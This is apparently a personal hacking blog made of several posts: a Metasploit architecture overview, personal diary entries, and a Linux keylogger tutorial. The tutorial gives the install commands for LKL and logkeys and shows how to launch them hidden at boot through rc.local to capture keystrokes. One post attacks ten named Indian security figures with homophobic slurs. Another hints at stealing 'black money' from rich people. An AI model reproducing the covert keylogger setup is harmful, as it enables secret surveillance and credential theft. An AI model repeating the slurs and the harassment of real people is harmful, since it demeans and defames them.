Metasploit, the theory behind it and the framework.

Hello, H3athe4d here, today I bring you some topics on metasploit and it’s very basics, you may call it as it’s foundation and the layout. So,in this post, I will go through the MSF framework in a definitive way. for anyone following my posts.

First and foremost, let me explain why people need metasploit, and why it is being used in penetration testing in a more successful way. They key to success with metasploit is it’s modular structure, and it’s flexibility with it’s different user interfaces and it’s functionality. I will discuss here the architecture of the metasploit framework.

The architecture of the metasploit framework is based on primarily 3 things, first is “libraries”, second is “interfaces”, and the third and the most important one to the user is “modules”.

The Library consists of:

a.) REX

b.) MSF CORE

c.) MSF BASE

The Interfaces consists of:

a.) CONSOLE

b.) CLI

c.) GUI

d.) COMMUNITY EDITION

e.) Armitage

although MSG GUI and Armitage both fall under the GUI interface, both aren’t the same, as well as this applies to the community edition of the metasploit. There are different “plugins” and “tools” in the metasploit directory that serves the libraries of the framework and then this whole bunch of library in turn serves to the interface, which the users rely on.

Then, there is this, “MODULES”, it consists of:

a.) Payload.

b.) Exploits.

c.) Encoders.

d.) NOPS.

e.) Auxiliaries.

I will elaborate all these terms at a later point, but, let’s concentrate on how the framework is “modular” and works in a perfect way, as it should. The metasploit filesystem and the libraries consists of:

LIB || DATA || TOOLS || MODULES || PLUGINS || SCRIPTS || EXTERNAL ||

So, this was my first post regarding METASPLOIT< I will continue explaining the whole framework in bit’s of posts, easy to follow, and understand the whole framework, catch you people at a later time.

 

 

Working on exploitation. The road ahead.

Hello folks, this is 23rd of February, and I have no clue how do i sleep without making myself the hardest person to EVER penetrate. I am working on exploitation (the art of penetration testing) and by default, i had come to know bunch of things, which I really would love to share. I believe, this has to be shared, not because people didn’t knew it already, for it’s for this, the people who didn’t know this. The art of exploitation, and the road ahead in security industry has a bigger scope, but, this doesn’t mean ANYONE would fit in the foreign land.

Security, and being able to protect it needs a sheer amount of dedication, which you cannot buy from a market. It’s pure dedication to what you do, and with the things you love to work with. So, on a clean note, the art of exploitation, has always been about learning all the time, learning new technology, learning and research on past as well, imagining things and framing it to look better (the artistic part !). Good hackers and always good artists as well, they might live a low life but ARE generously good hearted people, and with the right mix of the sugar to the coffee, we get a delicious taste.

I had been researching on a lot of things, working all the time, which i love it, and also, been onto the midst of corporate people, which is now a part of my life. It’s always the career I had ever dreamt of, working with the computers has been always good part, and always will be. From a job prospective, this will be the most awesome job satisfactory I can get, which most of the people lack, and hence take a lead in what i already do. I never had fear of consequences, and will never have, because my life has been alway this way, and I know the art 😉

top 7 faggotry maggots hackers in the name of 3thical shit in India.

Ladies and gentlemen, here I come again with the masked vendetta of truth to entertain you at my expenditure, show you the facts and figure you out of the puzzle, the riddle which is still in the midst of snowy clouds upon them. Here I present TOP 7 MAGGOTRY FAGGOTS ETHICAL HACKERS OF INDIA (10 actually if you refer to THIS POST).

The list enrolls these people on it.

1.) Ankit Fadia (Bankid Mania)
2.) Pranav Mistry (Intellect) <— take him out of the faggottry list.
3.) Sunny Vaghela (LOLOL Sunny boom bash)

4.) Vivek ramchandran <— yes, a intellect, REAL ACTUAL ETHICAL HACKER.

5.) Koushik Dutta <– Cynogenmod, android specialist, good coder.

6.) Aseem Jakhar (seriously, you?)

7.) Sai Satish (Phishing really doesn’t make you a hacker, neither does workshops)

8.) Benild Joseph (facepalm, you really think you are inside a *nix kernel?)

9.) Falgun Rathod (you don’t simply fit)

10.) Rahul  Tyagi (you are a mass phail joker, at DEFCON, Las Vegas, we discuss your weak brain, we study your 3 cent physiology)

The ones BOLDED in my 1337 list makes 7 of the maggotry faggot 3thical hackers of India, the word, the term “ethical” itself is NOT to be used, if you already know you are onto ethics, people understand it naturally. 7 mass players of these workshop (they call it deliverance of vivid knowledge on topics of metasploit, with Windows DCOM exploit and BOF) and call it h4x0r1ng. A very good study shows the people who DO THINGS, never get listed in “such ethical list”. The workshops, these wise people, the bolded one’s conduct are UTTER CRAP with no real h4x0ring on them, which is why, “certain” people get provoked when they compare the level of h4x0ring they are onto. Ankit Fadia, the 1999’s technobrain, TECHNICALLY doesn’t work out on 2013, it’s that simple FACT. Keeping it real, i still don’t get an idea, what’s Rahul Tyagi onto? he says he + (some Parul Khanna) are hackers, and yet, THEY FAIL SO HARD.

You will get these clowns at:

http://attrition.org/errata/plagiarism/rahul_tyagi/hacking_crux2.html

Search them at attrition.org and you will find what there crap consists. L O L.
Big time jokers playing the show, the time this simple middle line breaks, REAL people behind the scenes will come out of the den, isn’t it ninjas? 😉

Linux Keylogger, a.k.a LKL [Installation and Operation] Keylogger kung fu ./-*___|

Today I will post about something more cool than the usual crap 🙂 yes, LKL keylogger for Linux. Since people mostly brag about win*DOZE* versions of keyloggers, I was forced to come up with this juice of the day to make the night more linux compatible (since also night’s mean h4x0ring, but keylogg’ng ain’t h4x0ring).

What would you need s the free LKL project source code, which can be found at

http://sourceforge.net/projects/lkl/

This page would look like this, somehow, download the source code files:

 

You need to extract the tar.gz, do this as shown:

Do a configure first, on the command line,

./configure
make && make install

I had shown what is to be done on the image below:

How to use?
sudo lkl -l -k /home/XYZ/Downloads/lkl/keymaps/it_km -o /home/XYZ/loggy.log

now it has to start automatically at any reboot
cd /etc/init.d
sudo vi rc.local
add at the bottom “/usr/local/bin/lkl -l -k /home/XYZ/Downloads/lkl/keymaps/it_km -o /home/XYZ/loggy.log &”

Edit:Seems some of you got a prob to figure out (keymaps) ok I will make it much more easier

apt-get install lkl

to see how to use live type lkl from terminal of course by logging in as root on the terminal.
For reference use this program, you must know first where the position of the file that contains about keymaps or form we will record your keyboard. You can search with the command:

whereis lkl

If my position in the / usr / share / lkl / keymaps

Command, if on my computer.

lkl-l-k / usr / share / lkl / keymaps / us_km-o / home / Coded / logk.txt

So the message appears

Started to log port 0×60. Keymap is / usr / share / lkl / keymaps / us_km. The logfile is / home / S@xx0R / logk.txt.

Done.

logkeys v0.1.1a (latest)

fixed 100% CPU issue on x64
various bug fixes
removed pgrep dependency
PID file now in /var/run/
other symlink attack vulnerability fixes
other security fixes
code refactoring
remote log uploading via HTTP
lkl and lklk are now llk and llkk to avoid confusion
llk and llkk are now programs that run logkeys-start.sh/-stop.sh scripts
also recognize “HID” USB keyboard devices
bug fixes

Download:

How to install?
gunzip logkeys-0.1.1a.tar.gz
tar xvf logkeys-0.1.1a.tar
cd logkeys-0.1.1a/
cd build/
../configure
(‘sudo apt-get install build-essential’ if previous command fails)
make
sudo make install

How to use?
sudo logkeys -s -m /home/XYZ/Downloads/de.map -o /home/XYZ/loggy.log
sudo logkeys -k

Now it has to start automatically at boot time:
cd /etc/init.d
sudo vi rc.local
add at the bottom “/usr/local/bin/logkeys -s -m /home/XYZ/Downloads/de.map -o /home/XYZ/loggy.log &”

 

If you are still unsure, read the manual page (man page) or the README

that comes with it, it’s supposed to be in /lkl/ directory itself, here:

 

 

That was all, read more or post your comments away if you get stuck, astala vista !

There was a time.

There has been always a good and a bad side of every person, I had/have my bad sides as well, they aren’t a secret, I smoke, and I am a bit mad when i get angry, that’s all I can recall as far as i know about myself. The good ones, I have some few of them, and “there was a time”, when I used to be so innocent, having no idea at all how to compete, till this date, I find strange people all over the places, pondering over there own profit even if they don’t know shit ! still, ah, ignored. But what about the pressure you give “with YOUR” wicked ways to make some profit? some die, some live and die, the rest “just” live with what they have, what i have is “JUST” a good will to do, what I DO. And I never regret what I DO, because I KNOW what I DO.

So this post is all about “pointing” out, why is there so much cruelty, selfishness, and etc, all over this place? I didn’t really come with a manual to LIVE, life teaches me my own ways in and out, still thinking about what is going on with this world, leaves me clueless, why it is, what IT IS? I don’t realize if someone has given a second thought about others, how they live, yesterday i saw a man in the street sleeping, still happy, but painful with those cold streets, but it is NOT THE PAIN that the streets that gives him, it’s the pain that WE actually give him, failing ourselves to provide the best for this world, which incredibly provides us so MUCH, and people still want more, WOW.

Today “if at all”, you realize it, you will forget it by tomorrow, you will regret it for some minutes, and then actually move on. BUT I DON’T want this to happen with myself, I wanted always to “make a change” and for that, I have to be the “part of change itself”, I realize the point there. So what are my plans? it’s little wicked, consider it as a “free service” survival and some donation, without getting covered, etc.  JUST A FREE SERVICE for “SOME” people, (not the poor), but the undeniable and unlucky “rich people” with there black money 😉

So how I do this? there are ways you know, some people show the path, some people lead “that” path, “some” people make there own ways, and I favor the last one 🙂
I wrote this here, because I would love to come back here and see myself at my posts and calculate to what i did, because I promised I would do this. Rest, to the rich prayers 😉 (you think you actually pray to god, without being selfish? eh, I see what you did there ! )

Good night, think about it 🙂

All about IT ethics.

Hey, I am writing this from my lab desk. SO here’s to what we call the “IT” ethics, never call a guy/girl with “maa’m”, “sir”, etc tag, always “first name” is to be used, said one of my seniors. So, from today we follow this, eh? but what about the ladies, I call them “jee” after taking there name, but that is not allowed, sad !

I don’t care about the ethics tho, because, my mind always trigger to call them by there name + “jee” or “insert_some_other_tag_here” name; but that’s okay, have to maintain and train myself to using ‘only’ the first name. So here are 2 girls (management sector of the company) + 1 my senior + 2nd senior + 3rd senior  = total of 5 + 1 (including me) = 6 members (closed ones core members).

So that’s all for today that I learned apart from the technical stuff !
Catch you people later !

3rd day at office

Responsibilities are BIG. Real work starts today.  So, today I went down the stairs down the hallway, and bingo came a call. We have clients to get their work done, well what is the work? the work i already do. So there are certain agencies that would hire certain people to do there work for, sometimes they may be illegal and they may be legal, depending on the situation. But we are sticking to do the legal ones, because we have to change from the bad side and come out to the good side and do good, and trust me, we are trained for this, but the moment you enter the office, there is a crap load of shit you can do, routers, switches (the big ones !) lease lines and much more. The plan has always been to do good and come to the market with advisories. But what when you find a bank full of money on a server ready to get leaked? do you possibly go over it which “would” down grade your reputation, at least in the real world but at the same time make out a full time black hat money? I had been down that lane, but nah, this isn’t the time, the oath i took to myself has been always persistent, has been intact to my beliefs. SO NO. There are always opportunities all around, but apart from it, what matters is ‘control’.

So this has been 3rd day in the office, things are secure, the lines are secure, no unusual activities, chances are we get in, get out, put up a designed framework for what methods we used to “get in” ! and then prepare a advisory, that’s it, simple, no lurking around confidential data, which would bring me profit for a real long time. Also, i love this job, knowing secrets, but, at the same time, “keeping” them a “secret” for “some” and “them” only. The day starts, and we are ready to step in. Roger that sir !

Started with Linux shoOting.

Here’s the big deal, I have started out with hardcore linux, because I need to add up my skills onto something, and remake it artistically beneficial for the companies that hire me. So I had taken this good ‘initiative’ to write what i learn in this blog, for others to know, you will find this blog really useful if you read it, and just not look at it. Apart from personal life, and all the other stuff I do, there have been a drastic changes all the time. The parts I have divided this linux are the following:

-> Linux Beginners
-> Linux Intermediate
-> Linux Advanced

to the beginners level, I would just wrap up with the flow of the theories that linux and it’s flavors fit in. To the intermediate, I will go through the Linux CLI (the command line interface) and then to bash scripting and different shells and there manipulation, and then we will talk about Linux advanced. where we will go deep down to kernel, memory management, page mapping, buffers, clocking the linux system, modprobing the drivers to work with, dependencies and several other higher aspects, so stay tuned to the linux section 😀

Onto the lights…

Onto the lights of the midnight, he codes, onto the lights of the midday, he executes, until the evening, he sleeps, and onto the dreams, she spells magic within him.

It’s a long journey since my college detention and up here now. There has been drastic changes, things that had molded me, shaped me to what i am here today. Things have changed for a better growth, and I accepted everything with a 🙂 there is nothing for regret. Also to add up, she comes in my dreams, cheers me up and when I get up, I stay tuned at the mobile screen to see her txt. On midnights, I rarely txt her up, not after 1:00 AM, but again, I wake up for the whole 6:00 AM. It’s got tough (the life) but “perfect” with the beautifulness of the codes in my brain.

Hello_world.include_world()

Broadcasting the world, this is h3athead, I will be publishing and keeping a track of my research and all other work here, this blog is made to keep myself updated and to follow my daily routine of the techno lulz with some learning that I deserve. All my work and written records go here. Rogering out./- h3athead !